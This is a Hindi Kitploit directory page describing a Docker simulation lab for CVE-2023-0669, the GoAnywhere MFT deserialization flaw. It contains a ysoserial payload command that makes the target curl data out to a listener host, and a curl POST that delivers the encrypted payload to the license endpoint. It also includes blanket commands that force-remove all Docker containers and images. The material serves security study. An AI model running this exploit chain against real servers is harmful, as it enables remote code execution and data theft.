Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2023-0669-simulation — CVE-2023-0669 के लिए सिमुलेशन वातावरण जिसमें Docker-आधारित हमलावर, संवेदनशील सर्वर और श्रोता कंटेनर शामिल हैं। डीसीरियलाइज़ेशन शोषण उत्पादन, पेलोड एन्क्रिप्शन और डेटा निष्कासन का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/zakaria-laouani/cve-2023-0669-simulation
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनकमांड एंड कंट्रोल
GitHubzakaria-laouani/cve-2023-0669-simulation

cve-2023-0669-simulation

CVE-2023-0669 के लिए सिमुलेशन वातावरण जिसमें Docker-आधारित हमलावर, संवेदनशील सर्वर और श्रोता कंटेनर शामिल हैं। डीसीरियलाइज़ेशन शोषण उत्पादन, पेलोड एन्क्रिप्शन और डेटा निष्कासन का प्रदर्शन करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
78 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

प्रोजेक्ट संरचना

cve-2023-0669-simulation/ ├── docker-compose.yml ├── attacker/ │ ├── Dockerfile │ └── CVE_2023_0669_helper.java ├── vulnerable/ │ ├── Dockerfile │ └── VulnerableServer.java ├── listener/ │ ├── Dockerfile │ └── server.py └── received/ ← स्वचालित रूप से बनाया गया (exfiltration)

2. तीन कंटेनर शुरू करें (attacker, vulnerable, listener)

docker-compose up --build

समस्या: docker compose up के दौरान KeyError: 'ContainerConfig' त्रुटि

इस प्रोजेक्ट के लिए आवश्यक है:

  • Docker Engine: न्यूनतम v24 या v25
  • Docker Compose: v2.20+ (Docker के साथ स्वचालित रूप से शामिल) KeyError: 'ContainerConfig' आमतौर पर पुराने या दूषित Docker मेटाडेटा, या पुरानी इमेज के कारण होता है। टूटे हुए कंटेनर, इमेज और मेटाडेटा हटाएं:

docker compose down --remove-orphans

docker rm -f $(docker ps -aq)

docker rmi -f $(docker images -q)

फिर साफ-साफ पुनर्निर्माण करें:

docker compose build --no-cache

docker compose up

3. हमलावर के कंटेनर में प्रवेश करें

docker exec -it attacker bash

सुरक्षित पेलोड जनरेशन (सिर्फ एक संदेश भेजता है)```

java -jar ysoserial-all.jar CommonsCollections6 'curl -s http://listener:8080/receive -d "PWNED-CVE-2023-0669-simulation-$(date)"' > payload.ser

पेलोड का एन्क्रिप्शन

java CVE_2023_0669_helper payload.ser 1

→ प्रदर्शित लंबी स्ट्रिंग को कॉपी करें (Ctrl+A फिर Ctrl+C)

एक्सप्लॉइट भेजें (अभी कॉपी किए गए LA_CHAINE से बदलें)

curl -X POST http://vulnerable:8001/goanywhere/lic/accept
-d "encryptedLicenseResponseData=LA_CHAÎNE_BASE64_ICI"
-d "acceptLicense=true"

7. तत्काल परिणाम

आप लिसनर के लॉग (या अपने PC पर ./received फ़ोल्डर) में देखेंगे:

PWNED ! Reçu 42 bytes → PWNED-CVE-2023-0669-simulation-Sat 06 Dec 2025...

टूल डाउनलोड करें